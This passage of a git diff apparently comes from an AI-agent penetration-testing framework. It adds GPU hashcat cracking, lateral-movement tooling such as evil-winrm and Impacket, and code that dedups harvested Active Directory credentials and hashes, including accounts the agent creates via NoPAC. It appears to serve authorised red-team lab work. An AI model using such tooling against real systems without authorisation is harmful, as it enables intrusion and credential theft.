"c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.48.0", + "windows-sys 0.61.2", ] [[package]] @@ -3665,6 +3770,17 @@ version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5" +[[package]] +name = "windows-registry" +version = "0.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "02752bf7fbdcce7f2a27a742f798510f3e5ad88dbe84871e5168e2120c3d5720" +dependencies = [ + "windows-link", + "windows-result", + "windows-strings", +] + [[package]] name = "windows-result" version = "0.4.1" diff --git a/Cargo.toml b/Cargo.toml index 3404af61..784d77f6 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -18,6 +18,7 @@ serde_yaml = "0.9" regex = "1" sqlx = { version = "0.8", features = ["runtime-tokio", "postgres", "chrono", "json", "uuid"] } tera = "1" +hickory-resolver = { version = "0.24", default-features = false, features = ["tokio-runtime", "system-config"] } # OpenTelemetry opentelemetry = "0.31" diff --git a/Taskfile.yaml b/Taskfile.yaml index 878b9d8b..d9b81157 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -26,6 +26,7 @@ includes: LOG_DIR: '{{.LOG_DIR}}' REPORT_DIR: '{{.REPORT_DIR}}' GRAFANA_URL: '{{.GRAFANA_URL}}' + LOKI_URL: '{{.LOKI_URL}}' DREADNODE_SERVER_URL: '{{.DREADNODE_SERVER_URL}}' DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION}}' DREADNODE_WORKSPACE: '{{.DREADNODE_WORKSPACE}}' @@ -51,6 +52,7 @@ includes: ARES_CONFIG: '{{.ARES_CONFIG}}' OTEL_TRACES_ENDPOINT: '{{.OTEL_TRACES_ENDPOINT}}' ALLOY_LOKI_ENDPOINT: '{{.ALLOY_LOKI_ENDPOINT}}' + LOKI_URL: '{{.LOKI_URL}}' blue: taskfile: .taskfiles/blue/Taskfile.yaml optional: true @@ -76,6 +78,7 @@ vars: # MODEL: '{{.MODEL | default "claude-sonnet-4-5-20250929"}}' MODEL: '{{.MODEL | default "gpt-5.2"}}' GRAFANA_URL: '{{.GRAFANA_URL}}' + LOKI_URL: '{{.LOKI_URL | default "https://loki.dev.plundr.ai"}}' POLL_INTERVAL: '{{.POLL_INTERVAL | 
default "30"}}' MAX_STEPS_BLUE: '{{.MAX_STEPS_BLUE | default "50"}}' MAX_STEPS_BLUE_ONCE: '{{.MAX_STEPS_BLUE_ONCE | default "15"}}' # ~15 min max for once mode diff --git a/ansible/playbooks/ares/goad_attack_box.yml b/ansible/playbooks/ares/goad_attack_box.yml index 2cc04435..7a30c485 100644 --- a/ansible/playbooks/ares/goad_attack_box.yml +++ b/ansible/playbooks/ares/goad_attack_box.yml @@ -32,7 +32,7 @@ alloy_deployment_name: "goad-attack-box" alloy_server_id: "" alloy_instance_id: "" - alloy_loki_endpoint: "{{ alloy_loki_endpoint }}" + alloy_loki_endpoint: "{{ lookup('env', 'ALLOY_LOKI_ENDPOINT') | default('http://localhost:3100/loki/api/v1/push', true) }}" alloy_version: "1.10.1" # Python version @@ -45,6 +45,12 @@ cracking_tools_gpu_support: true cracking_tools_hashcat_from_source: true cracking_tools_nvidia_opencl_icd: true + # Bake the kernel-mode NVIDIA driver + CUDA into the image. Without these, + # hashcat on g4dn (T4) reports "OpenCL platform not found" and falls back + # to john-on-CPU, which is too slow to feed credential cracks back into + # the orchestrator within an op's budget. + cracking_tools_install_nvidia_driver: true + cracking_tools_install_cuda_toolkit: true cracking_tools_wordlists: - rockyou - seclists_passwords @@ -113,9 +119,14 @@ changed_when: true roles: - # AWS infrastructure agents + # AWS infrastructure agents — skipped on non-AWS clouds because they + # require the EC2 instance metadata service (cloudwatch-agent's + # `fetch-config -m ec2` hits 169.254.169.254 and aborts the build + # on Azure). - role: dreadnode.nimbus_range.aws_ssm_agent + when: cloud_provider | default('aws') == 'aws' - role: dreadnode.nimbus_range.aws_cloudwatch_agent + when: cloud_provider | default('aws') == 'aws' # Base Ares requirements - role: dreadnode.nimbus_range.base diff --git a/ansible/roles/base/README.md b/ansible/roles/base/README.md index 6c13b679..a4449559 100644 --- a/ansible/roles/base/README.md +++ b/ansible/roles/base/README.md @@ -34,10 +34,9 @@ Base requirements for Ares AI agents | `base_pip_packages.0` | str | python-dotenv | No description | | `base_pip_packages.1` | str | rigging>=3.0 | No description | | `base_pip_packages.2` | str | pydantic | No description | -| `base_pip_packages.3` | str | asyncio | No description | -| `base_pip_packages.4` | str | aiohttp>=3.13.4 | No description | -| `base_pip_packages.5` | str | cryptography>=44.0.1 | No description | -| `base_pip_packages.6` | str | requests>=2.33.0 | No description | +| `base_pip_packages.3` | str | aiohttp>=3.13.4 | No description | +| `base_pip_packages.4` | str | cryptography>=44.0.1 | No description | +| `base_pip_packages.5` | str | requests>=2.33.0 | No description | | `base_pip_externally_managed` | bool | False | No description | | `base_pip_break_required` | bool | False | No description | | `base_system_packages` | list | [] | No description | @@ -140,7 +139,10 @@ Base requirements for Ares AI agents - **Fail when break-system-packages is required but disabled** (ansible.builtin.fail) - Conditional - **Fail when break-system-packages is required but unsupported by pip** (ansible.builtin.fail) - Conditional - **Upgrade pip to latest (CVE fixes)** (ansible.builtin.command) -- **Install Ares Python dependencies** (ansible.builtin.pip) +- **Install Ares Python dependencies (with full log)** (ansible.builtin.shell) +- **Show pip install log tail on failure** (ansible.builtin.command) - Conditional +- **Print pip install tail** (ansible.builtin.debug) - Conditional +- **Fail if pip install 
failed** (ansible.builtin.fail) - Conditional - **Create Ares workspace directory** (ansible.builtin.file) - Conditional ### main.yml diff --git a/ansible/roles/base/defaults/main.yml b/ansible/roles/base/defaults/main.yml index 6588b5a0..e366f5da 100644 --- a/ansible/roles/base/defaults/main.yml +++ b/ansible/roles/base/defaults/main.yml @@ -28,11 +28,14 @@ base_rust_install_script: "https://sh.rustup.rs" base_install_pipx: true # Ares Python dependencies (installed via pip) +# Do NOT add `asyncio` here — Python 3.4+ ships asyncio in the stdlib. The +# PyPI `asyncio` package is a 2015-era stub that ships an `asyncio.py` into +# site-packages, shadowing the stdlib module and breaking any import of +# asyncio (including the rest of this pip install run on Python 3.13). base_pip_packages: - python-dotenv - "rigging>=3.0" - pydantic - - asyncio - "aiohttp>=3.13.4" - "cryptography>=44.0.1" - "requests>=2.33.0" diff --git a/ansible/roles/base/tasks/linux.yml b/ansible/roles/base/tasks/linux.yml index 62d42782..4b7350ab 100644 --- a/ansible/roles/base/tasks/linux.yml +++ b/ansible/roles/base/tasks/linux.yml @@ -142,16 +142,50 @@ become: true changed_when: false -- name: Install Ares Python dependencies - ansible.builtin.pip: - name: "{{ base_pip_packages }}" - state: present - executable: "{{ base_pip_executable }}" - extra_args: >- - {{ '--break-system-packages' if base_pip_break_required else '' }} - {{ '--ignore-installed' if ansible_facts['os_family'] == 'Debian' else '' }} +# Run pip directly via shell so we can tee stdout+stderr to a log file. The +# ansible.builtin.pip module captures output into a single `msg` field that +# is too large for CloudWatch's per-event size limit on this dep tree +# (rigging pulls 100+ transitives), so failures show up as a truncated stdout +# with no stderr or rc visible. The tee'd log lets the next task surface the +# real error. +# +# `--ignore-installed` is required: Kali ships several Python deps via apt +# (python3-requests, python3-cryptography, python3-urllib3, python3-yaml). +# apt-installed packages have no pip RECORD file, so pip's normal upgrade +# path fails with `uninstall-no-record-file` ("The package was installed +# by debian"). `--ignore-installed` skips uninstall and overwrites in place. 
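+#
+# `set -o pipefail` in the cmd below is what keeps the registered rc
+# meaningful: without it the pipeline's exit status would be tee's (always
+# 0), and the `rc != 0` guards on the follow-up tasks would never fire.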
+- name: Install Ares Python dependencies (with full log)
+  ansible.builtin.shell:
+    cmd: |
+      set -o pipefail
+      {{ base_pip_executable }} install \
+        {{ '--break-system-packages' if base_pip_break_required else '' }} \
+        --ignore-installed \
+        --no-color \
+        {{ base_pip_packages | map('quote') | join(' ') }} \
+        2>&1 | tee /tmp/ares-pip-install.log
+    executable: /bin/bash
+  become: true
+  register: base_pip_install_result
+  changed_when: false
+  failed_when: false
+
+- name: Show pip install log tail on failure
+  ansible.builtin.command: tail -120 /tmp/ares-pip-install.log
   become: true
+  register: base_pip_install_tail
   changed_when: false
+  when: base_pip_install_result.rc != 0
+
+- name: Print pip install tail
+  ansible.builtin.debug:
+    var: base_pip_install_tail.stdout_lines
+  when: base_pip_install_result.rc != 0
+
+- name: Fail if pip install failed
+  ansible.builtin.fail:
+    msg: "pip install failed (rc={{ base_pip_install_result.rc }}); see tail above"
+  when: base_pip_install_result.rc != 0

- name: Create Ares workspace directory
  ansible.builtin.file:
diff --git a/ansible/roles/cracking_tools/README.md b/ansible/roles/cracking_tools/README.md
index 6c12b795..29795586 100644
--- a/ansible/roles/cracking_tools/README.md
+++ b/ansible/roles/cracking_tools/README.md
@@ -53,6 +53,17 @@ Install and configure password cracking tools for Ares agents
| `cracking_tools_opencl_packages.1` | str | opencl-headers | No description |
| `cracking_tools_opencl_packages.2` | str | clinfo | No description |
| `cracking_tools_nvidia_opencl_icd` | bool | False | No description |
+| `cracking_tools_install_nvidia_driver` | bool | False | No description |
+| `cracking_tools_install_cuda_toolkit` | bool | False | No description |
+| `cracking_tools_nvidia_driver_packages` | list | [] | No description |
+| `cracking_tools_nvidia_driver_packages.0` | str | linux-headers-cloud-amd64 | No description |
+| `cracking_tools_nvidia_driver_packages.1` | str | dkms | No description |
+| `cracking_tools_nvidia_driver_packages.2` | str | firmware-misc-nonfree | No description |
+| `cracking_tools_nvidia_driver_packages.3` | str | nvidia-kernel-open-dkms | No description |
+| `cracking_tools_nvidia_driver_packages.4` | str | nvidia-driver-cuda | No description |
+| `cracking_tools_nvidia_driver_packages.5` | str | nvidia-opencl-icd | No description |
+| `cracking_tools_nvidia_cuda_toolkit_packages` | list | [] | No description |
+| `cracking_tools_nvidia_cuda_toolkit_packages.0` | str | nvidia-cuda-toolkit | No description |
| `cracking_tools_update_cache` | bool | True | No description |
## Tasks
@@ -94,9 +105,17 @@ Install and configure password cracking tools for Ares agents
- **Set DEBIAN_FRONTEND to noninteractive** (ansible.builtin.lineinfile) - Conditional
- **Update apt cache** (ansible.builtin.apt) - Conditional
- **Create wordlist directory** (ansible.builtin.file)
+- **Install NVIDIA driver and OpenCL runtime (with full log)** (ansible.builtin.shell) - Conditional
+- **Show NVIDIA install log tail on failure** (ansible.builtin.command) - Conditional
+- **Print NVIDIA install tail** (ansible.builtin.debug) - Conditional
+- **Fail if NVIDIA install failed** (ansible.builtin.fail) - Conditional
+- **Install NVIDIA CUDA toolkit** (ansible.builtin.apt) - Conditional
- **Install GPU support packages** (ansible.builtin.apt) - Conditional
- **Create OpenCL vendors directory** (ansible.builtin.file) - Conditional
- **Register NVIDIA OpenCL ICD** (ansible.builtin.copy) - Conditional
+- **Verify NVIDIA driver (non-fatal — no GPU on builder hosts)** (ansible.builtin.command) - Conditional
+- **Verify OpenCL platform discovery (non-fatal)** (ansible.builtin.command) - Conditional
+- **Show GPU/OpenCL detection summary** (ansible.builtin.debug) - Conditional
- **Ensure libgcc runtime is present for hashcat** (block) - Conditional
- **Install primary libgcc package** (ansible.builtin.apt)
- **Ensure libgcc static archive is present for hashcat** (block) - Conditional
diff --git a/ansible/roles/cracking_tools/defaults/main.yml b/ansible/roles/cracking_tools/defaults/main.yml
index 4fe3e9b7..af1d326c 100644
--- a/ansible/roles/cracking_tools/defaults/main.yml
+++ b/ansible/roles/cracking_tools/defaults/main.yml
@@ -50,4 +50,35 @@ cracking_tools_opencl_packages:
 # Set to true when using nvidia/cuda base image to register NVIDIA OpenCL ICD
 cracking_tools_nvidia_opencl_icd: false
+# Install the NVIDIA kernel-mode driver + OpenCL runtime on the host. Required
+# on bare-metal/AMI builds (g4dn etc.) where the Kali base image ships without
+# any NVIDIA bits — without this hashcat reports "OpenCL platform not found".
+# Leave false for container builds: the nvidia/cuda runtime base image
+# already provides libnvidia-opencl/libcuda, and the kernel module comes
+# from the host via nvidia-container-toolkit.
+cracking_tools_install_nvidia_driver: false
+# Install the full CUDA toolkit so hashcat can use the CUDA backend (faster
+# than OpenCL on T4/A10/etc.). Pulls ~3GB; only enable on AMI builds.
+cracking_tools_install_cuda_toolkit: false
+# Recommends are intentionally enabled — DKMS, libcuda1, and the kernel
+# module build chain come in via Recommends on Debian/Kali.
+# Kali AMIs ship the `+kali-cloud-amd64` kernel — needs the `cloud` headers
+# meta-package. We pull the driver + open-source kernel module from NVIDIA's
+# CUDA Debian repo (added in tasks/linux.yml) because Kali's archive
+# nvidia-driver (550.163.01) does not build against kernel 6.19+.
+# `nvidia-kernel-open-dkms` is required for Turing+ (T4 included) on
+# modern kernels; legacy `nvidia-kernel-dkms` is a dead-end here. Pair it
+# with `nvidia-driver-cuda` (CUDA-only userspace) — the `cuda-drivers`
+# meta and full `nvidia-driver` both pull `nvidia-kernel-dkms` (closed
+# kernel module), which Conflicts with the open variant.
+cracking_tools_nvidia_driver_packages:
+  - linux-headers-cloud-amd64
+  - dkms
+  - firmware-misc-nonfree
+  - nvidia-kernel-open-dkms
+  - nvidia-driver-cuda
+  - nvidia-opencl-icd
+cracking_tools_nvidia_cuda_toolkit_packages:
+  - nvidia-cuda-toolkit
+
 cracking_tools_update_cache: true
diff --git a/ansible/roles/cracking_tools/tasks/linux.yml b/ansible/roles/cracking_tools/tasks/linux.yml
index 551746d3..367f9d24 100644
--- a/ansible/roles/cracking_tools/tasks/linux.yml
+++ b/ansible/roles/cracking_tools/tasks/linux.yml
@@ -24,6 +24,131 @@
     mode: '0755'
   become: true
+# Kali rolling ships kernel 6.19.x, which the Kali archive's NVIDIA driver
+# (550.163.01) cannot compile against — DKMS exits 2. NVIDIA's official
+# CUDA Debian repo carries 575+, which supports modern kernels and offers
+# `nvidia-kernel-open-dkms` (the open-source kernel module) for Turing+ GPUs.
+# We add this repo first so the apt install below resolves to fresh
+# packages instead of the stale Kali ones.
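+# The `creates:` guard on the task below keys on the keyring file that the
+# cuda-keyring package installs, so re-runs skip both the download and the
+# `apt-get update`.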
+- name: Add NVIDIA CUDA apt repository (Kali ships 550.x which fails on kernel 6.19+) + ansible.builtin.shell: | + set -euxo pipefail + cd /tmp + curl -fsSLo cuda-keyring.deb \ + https://developer.download.nvidia.com/compute/cuda/repos/debian13/x86_64/cuda-keyring_1.1-1_all.deb + apt-get install -y ./cuda-keyring.deb + apt-get update -q + rm -f cuda-keyring.deb + args: + creates: /usr/share/keyrings/cuda-archive-keyring.gpg + executable: /bin/bash + become: true + when: + - cracking_tools_install_nvidia_driver | bool + - ansible_facts['os_family'] == 'Debian' + +# Install kernel headers + dkms FIRST in their own apt transaction, so they +# are fully configured before NVIDIA's dpkg postinst runs `dkms autoinstall`. +# When mixed in a single apt-get call, dpkg may configure +# `nvidia-kernel-open-dkms` before `linux-headers-cloud-amd64` finishes +# setting up, and DKMS exits 2 because the headers aren't yet in place. +- name: Install kernel headers and DKMS prerequisites + ansible.builtin.apt: + name: + - linux-headers-cloud-amd64 + - dkms + - build-essential + - firmware-misc-nonfree + state: present + install_recommends: true + become: true + when: + - cracking_tools_install_nvidia_driver | bool + - ansible_facts['os_family'] == 'Debian' + +# Driven through shell+tee instead of ansible.builtin.apt: the apt module +# captures dpkg stderr but truncates large stdout (DKMS kernel-module build +# errors land deep in apt-get's output, well after the cutoff). With tee we +# can show the real error on failure. +- name: Install NVIDIA driver and OpenCL runtime (with full log) + ansible.builtin.shell: + cmd: | + set -o pipefail + DEBIAN_FRONTEND=noninteractive apt-get install -y \ + -o Dpkg::Options::=--force-confdef \ + -o Dpkg::Options::=--force-confold \ + -o APT::Install-Recommends=yes \ + {{ cracking_tools_nvidia_driver_packages | map('quote') | join(' ') }} \ + 2>&1 | tee /tmp/ares-nvidia-install.log + executable: /bin/bash + become: true + register: cracking_tools_nvidia_install_result + changed_when: false + failed_when: false + when: + - cracking_tools_install_nvidia_driver | bool + - ansible_facts['os_family'] == 'Debian' + +- name: Show NVIDIA install log tail on failure + ansible.builtin.command: tail -200 /tmp/ares-nvidia-install.log + become: true + register: cracking_tools_nvidia_install_tail + changed_when: false + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Print NVIDIA install tail + ansible.builtin.debug: + var: cracking_tools_nvidia_install_tail.stdout_lines + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Dump DKMS make.log on failure + ansible.builtin.shell: | + set +e + for f in /var/lib/dkms/nvidia/*/build/make.log; do + echo "==== $f ====" + tail -150 "$f" 2>&1 || true + done + echo "==== build env ====" + which gcc cc make 2>&1 || true + gcc --version 2>&1 || true + dpkg -l build-essential gcc make 2>&1 | tail -10 || true + args: + executable: /bin/bash + register: cracking_tools_dkms_make_log + changed_when: false + failed_when: false + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Print DKMS make.log + ansible.builtin.debug: + var: cracking_tools_dkms_make_log.stdout_lines + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Fail if NVIDIA install failed + 
ansible.builtin.fail: + msg: "NVIDIA driver install failed (rc={{ cracking_tools_nvidia_install_result.rc }}); see tail above" + when: + - cracking_tools_install_nvidia_driver | bool + - cracking_tools_nvidia_install_result.rc | default(0) != 0 + +- name: Install NVIDIA CUDA toolkit + ansible.builtin.apt: + name: "{{ cracking_tools_nvidia_cuda_toolkit_packages }}" + state: present + install_recommends: true + become: true + when: + - cracking_tools_install_cuda_toolkit | bool + - ansible_facts['os_family'] == 'Debian' + - name: Install GPU support packages ansible.builtin.apt: name: "{{ cracking_tools_opencl_packages }}" @@ -51,6 +176,33 @@ - cracking_tools_gpu_support | bool - cracking_tools_nvidia_opencl_icd | default(false) | bool +# nvidia-smi/clinfo will return non-zero on a CPU-only AMI builder (no GPU +# attached) — that's expected. The check is purely informational so a logged +# failure on the first GPU boot is easy to spot. +- name: Verify NVIDIA driver (non-fatal — no GPU on builder hosts) + ansible.builtin.command: nvidia-smi + register: cracking_tools_nvidia_smi + changed_when: false + failed_when: false + when: cracking_tools_install_nvidia_driver | bool + +- name: Verify OpenCL platform discovery (non-fatal) + ansible.builtin.command: clinfo -l + register: cracking_tools_clinfo + changed_when: false + failed_when: false + when: + - cracking_tools_gpu_support | bool + - cracking_tools_install_nvidia_driver | bool + +- name: Show GPU/OpenCL detection summary + ansible.builtin.debug: + msg: + - "nvidia-smi rc={{ cracking_tools_nvidia_smi.rc | default('skipped') }}" + - "clinfo rc={{ cracking_tools_clinfo.rc | default('skipped') }}" + - "{{ cracking_tools_clinfo.stdout | default('clinfo not run') }}" + when: cracking_tools_install_nvidia_driver | bool + - name: Ensure libgcc runtime is present for hashcat when: - cracking_tools_install_hashcat diff --git a/ansible/roles/lateral_movement_tools/README.md b/ansible/roles/lateral_movement_tools/README.md index 8d194ff0..690de5fd 100644 --- a/ansible/roles/lateral_movement_tools/README.md +++ b/ansible/roles/lateral_movement_tools/README.md @@ -118,7 +118,7 @@ Install and configure lateral movement and credential extraction tools for Ares - **Create symlink for ffitarget.h in standard include path** (ansible.builtin.file) - Conditional - **Install rubyzip gem for evil-winrm dependency** (community.general.gem) - Conditional - **Install evil-winrm gem (Ubuntu only, Kali uses apt)** (community.general.gem) - Conditional -- **Update vulnerable ruby gem dependencies (net-imap, resolv, rexml, uri, zlib)** (ansible.builtin.command) - Conditional +- **Update vulnerable ruby gem dependencies (Ubuntu only - Kali patches via apt)** (ansible.builtin.command) - Conditional - **Install pth-toolkit (Kali only - may not be available in all repos)** (ansible.builtin.apt) - Conditional - **Warn if pth-toolkit installation failed** (ansible.builtin.debug) - Conditional - **Install Impacket from source for lateral movement tools** (ansible.builtin.include_tasks) - Conditional diff --git a/ansible/roles/lateral_movement_tools/tasks/linux.yml b/ansible/roles/lateral_movement_tools/tasks/linux.yml index 5ca9c59f..3abc6318 100644 --- a/ansible/roles/lateral_movement_tools/tasks/linux.yml +++ b/ansible/roles/lateral_movement_tools/tasks/linux.yml @@ -229,12 +229,25 @@ - ansible_facts['distribution'] != 'Kali' - lateral_movement_tools_install_evil_winrm -- name: Update vulnerable ruby gem dependencies (net-imap, resolv, rexml, uri, zlib) - 
ansible.builtin.command: gem update net-imap resolv rexml uri zlib +# `gem update` is skipped on Kali: evil-winrm ships via apt and Kali tracks +# CVE patches for net-imap/rexml/uri/zlib through its `ruby-*` debs. On +# AMI builders, `gem update` here also tends to SIGKILL (rc=-9) inside the +# Image Builder runner regardless of `--no-document`, so we keep it +# best-effort with `failed_when: false` and limit it to non-Kali Debian. +- name: Update vulnerable ruby gem dependencies (Ubuntu only - Kali patches via apt) + ansible.builtin.command: gem update --no-document {{ item }} become: true changed_when: true + failed_when: false + loop: + - net-imap + - resolv + - rexml + - uri + - zlib when: - ansible_facts['os_family'] == 'Debian' + - ansible_facts['distribution'] != 'Kali' - lateral_movement_tools_install_evil_winrm - name: Install pth-toolkit (Kali only - may not be available in all repos) diff --git a/ares-cli/Cargo.toml b/ares-cli/Cargo.toml index ba2f93bf..7f4ff676 100644 --- a/ares-cli/Cargo.toml +++ b/ares-cli/Cargo.toml @@ -32,6 +32,7 @@ regex = { workspace = true } dotenvy = "0.15" async-trait = "0.1" thiserror = { workspace = true } +hickory-resolver = { workspace = true } [build-dependencies] serde = { version = "1", features = ["derive"] } diff --git a/ares-cli/src/dedup/credentials.rs b/ares-cli/src/dedup/credentials.rs index d31ae140..416d0401 100644 --- a/ares-cli/src/dedup/credentials.rs +++ b/ares-cli/src/dedup/credentials.rs @@ -5,7 +5,7 @@ use std::sync::LazyLock; use ares_core::models::Credential; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; /// Strip ANSI escape sequences from text. pub(super) static RE_ANSI: LazyLock = @@ -75,6 +75,9 @@ pub(crate) fn sanitize_credentials(creds: &mut Vec) { if username.starts_with("evil") && username.ends_with('$') { return false; } + if is_ghost_machine_account(&username) { + return false; + } true }); } diff --git a/ares-cli/src/dedup/domains.rs b/ares-cli/src/dedup/domains.rs index b0bd5a0c..82818add 100644 --- a/ares-cli/src/dedup/domains.rs +++ b/ares-cli/src/dedup/domains.rs @@ -179,12 +179,14 @@ pub(crate) fn normalize_state_domains( { let mut valid_domains: HashSet = HashSet::new(); + let mut host_fqdns: HashSet = HashSet::new(); if let Some(td) = target_domain { valid_domains.insert(td.to_lowercase()); } for host in hosts { if !host.hostname.is_empty() && host.hostname.contains('.') { let lower = host.hostname.to_lowercase(); + host_fqdns.insert(lower.clone()); let parts: Vec<&str> = lower.split('.').collect(); if parts.len() > 1 { valid_domains.insert(parts[1..].join(".")); @@ -193,10 +195,20 @@ pub(crate) fn normalize_state_domains( } for user in users { if !user.domain.is_empty() { - valid_domains.insert(user.domain.to_lowercase()); + let d = user.domain.to_lowercase(); + // Skip user.domain values that are actually a host FQDN — + // some parsers misattribute and assign the DC's FQDN as the + // user's AD domain, which would otherwise let the FQDN survive + // the retain() filter below as a phantom "domain". 
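+            // e.g. a DC FQDN such as `win-30dz5ngfa7m.c26h.local` arriving
+            // in user.domain must not seed valid_domains here.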
+ if !host_fqdns.contains(&d) { + valid_domains.insert(d); + } } } - domains.retain(|d| valid_domains.contains(&d.to_lowercase())); + domains.retain(|d| { + let lower = d.to_lowercase(); + valid_domains.contains(&lower) && !host_fqdns.contains(&lower) + }); } } diff --git a/ares-cli/src/dedup/hashes.rs b/ares-cli/src/dedup/hashes.rs index 184bbec8..26c84e1f 100644 --- a/ares-cli/src/dedup/hashes.rs +++ b/ares-cli/src/dedup/hashes.rs @@ -1,9 +1,9 @@ -use std::collections::HashSet; +use std::collections::{HashMap, HashSet}; use ares_core::models::Hash; use super::credentials::strip_ansi; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; fn normalize_hash_type(hash_type: &str) -> String { match hash_type.trim().to_lowercase().as_str() { @@ -17,20 +17,58 @@ fn normalize_hash_type(hash_type: &str) -> String { } pub(crate) fn dedup_hashes(hashes: &[Hash]) -> Vec { - let mut seen = HashSet::new(); - let mut result = Vec::new(); + // First pass: for each (username, hash_type, hash_value), remember the longest + // non-empty domain we've seen. Parsers sometimes emit the same hash twice — once + // with `DOMAIN\` prefix (populated domain) and once bare (empty domain) — and + // without this lookup the keyed-by-domain dedup keeps both as separate rows. + let mut domain_lookup: HashMap<(String, String, String), String> = HashMap::new(); for h in hashes { let domain = strip_trailing_dot(h.domain.trim()).to_lowercase(); - let hash_value = strip_ansi(&h.hash_value); + if domain.is_empty() { + continue; + } let key = ( - domain.clone(), h.username.trim().to_lowercase(), h.hash_type.trim().to_lowercase(), - hash_value.trim().to_lowercase(), + strip_ansi(&h.hash_value).trim().to_lowercase(), ); + domain_lookup + .entry(key) + .and_modify(|d| { + if domain.len() > d.len() { + *d = domain.clone(); + } + }) + .or_insert(domain); + } + + let mut seen = HashSet::new(); + let mut result = Vec::new(); + for h in hashes { + let username = strip_ansi(&h.username); + if is_ghost_machine_account(&username) { + continue; + } + let username_l = h.username.trim().to_lowercase(); + let hash_type_l = h.hash_type.trim().to_lowercase(); + let hash_value = strip_ansi(&h.hash_value); + let hash_value_l = hash_value.trim().to_lowercase(); + + let mut domain = strip_trailing_dot(h.domain.trim()).to_lowercase(); + if domain.is_empty() { + if let Some(d) = domain_lookup.get(&( + username_l.clone(), + hash_type_l.clone(), + hash_value_l.clone(), + )) { + domain.clone_from(d); + } + } + + let key = (domain.clone(), username_l, hash_type_l, hash_value_l); if seen.insert(key) { let mut cleaned = h.clone(); - cleaned.domain = strip_trailing_dot(cleaned.domain.trim()).to_lowercase(); + cleaned.domain = domain; cleaned.hash_type = normalize_hash_type(&cleaned.hash_type); cleaned.hash_value = hash_value.trim().to_string(); cleaned.username = strip_ansi(&cleaned.username); diff --git a/ares-cli/src/dedup/mod.rs b/ares-cli/src/dedup/mod.rs index 9ae3550e..78f78211 100644 --- a/ares-cli/src/dedup/mod.rs +++ b/ares-cli/src/dedup/mod.rs @@ -7,9 +7,32 @@ pub(crate) mod users; #[cfg(test)] mod tests; -/// Strip trailing DNS root dot from domain strings (e.g. `child.contoso.local.` → `child.contoso.local`). +use regex::Regex; +use std::sync::LazyLock; + +/// Strip trailing DNS root dot and NetExec "0." artifact from domain strings +/// (e.g. `child.contoso.local.` → `child.contoso.local`, +/// `contoso.local0` → `contoso.local`). 
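+/// The `0` is only stripped when the character before it is alphabetic, so
+/// hostnames with a genuine trailing digit (`host10`, `dc10.contoso.local`)
+/// are left untouched.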
pub(super) fn strip_trailing_dot(s: &str) -> &str { - s.strip_suffix('.').unwrap_or(s) + let s = s.trim_end_matches('.'); + // NetExec sometimes appends "0" to domain TLDs. Strip if the char + // before the trailing 0 is alphabetic (i.e. TLD-like, not "host10"). + match s.strip_suffix('0') { + Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean, + _ => s, + } +} + +/// Auto-generated Windows hostname pattern (`WIN-` + 11 alphanumerics + optional `$`). +/// Used to filter ghost machine accounts that the agent created itself via +/// NoPAC / MachineAccountQuota — not real lab hosts, just our own residue. +static GHOST_MACHINE_ACCOUNT_RE: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)^WIN-[A-Z0-9]{11}\$?$").unwrap()); + +/// True if `username` looks like an auto-generated Windows machine account +/// (e.g. `WIN-G9FWV8ZNSCL$`) — typically agent-created via NoPAC. +pub(crate) fn is_ghost_machine_account(username: &str) -> bool { + GHOST_MACHINE_ACCOUNT_RE.is_match(username.trim()) } pub(crate) use credentials::{dedup_credentials, sanitize_credentials}; diff --git a/ares-cli/src/dedup/tests.rs b/ares-cli/src/dedup/tests.rs index 37741985..2570f229 100644 --- a/ares-cli/src/dedup/tests.rs +++ b/ares-cli/src/dedup/tests.rs @@ -361,6 +361,25 @@ fn strip_trailing_dot_removes_dot() { assert_eq!(strip_trailing_dot("."), ""); } +#[test] +fn strip_trailing_dot_removes_netexec_zero_artifact() { + use super::strip_trailing_dot; + // NetExec appends "0" or "0." to domain names + assert_eq!(strip_trailing_dot("contoso.local0"), "contoso.local"); + assert_eq!(strip_trailing_dot("contoso.local0."), "contoso.local"); + assert_eq!( + strip_trailing_dot("child.contoso.local0"), + "child.contoso.local" + ); + assert_eq!(strip_trailing_dot("fabrikam.local0."), "fabrikam.local"); + // Must NOT strip real trailing 0 from hostnames like "host10" + assert_eq!(strip_trailing_dot("host10"), "host10"); + assert_eq!( + strip_trailing_dot("dc10.contoso.local"), + "dc10.contoso.local" + ); +} + #[test] fn strip_ansi_removes_escape_sequences() { use super::credentials::strip_ansi; @@ -621,6 +640,26 @@ fn normalize_state_domains_domain_filtering_based_on_host_fqdns() { assert!(!domains.contains(&"orphan.local".to_string())); } +#[test] +fn normalize_state_domains_drops_host_fqdn_masquerading_as_domain() { + // A parser/credential publish path sometimes pushes a DC's FQDN + // (e.g. `WIN-30DZ5NGFA7M.c26h.local`) into the domain set. The dedup + // filter must drop entries that exactly match a known host hostname, + // even when a user or credential has the FQDN in its `domain` field. + let users = vec![make_user("win-30dz5ngfa7m.c26h.local", "admin")]; + let mut creds = vec![]; + let mut hashes = vec![]; + let mut domains = vec![ + "c26h.local".to_string(), + "win-30dz5ngfa7m.c26h.local".to_string(), + ]; + let hosts = vec![make_host("192.168.58.10", "win-30dz5ngfa7m.c26h.local")]; + + normalize_state_domains(&users, &mut creds, &mut hashes, &mut domains, &hosts, None); + + assert_eq!(domains, vec!["c26h.local".to_string()]); +} + #[test] fn 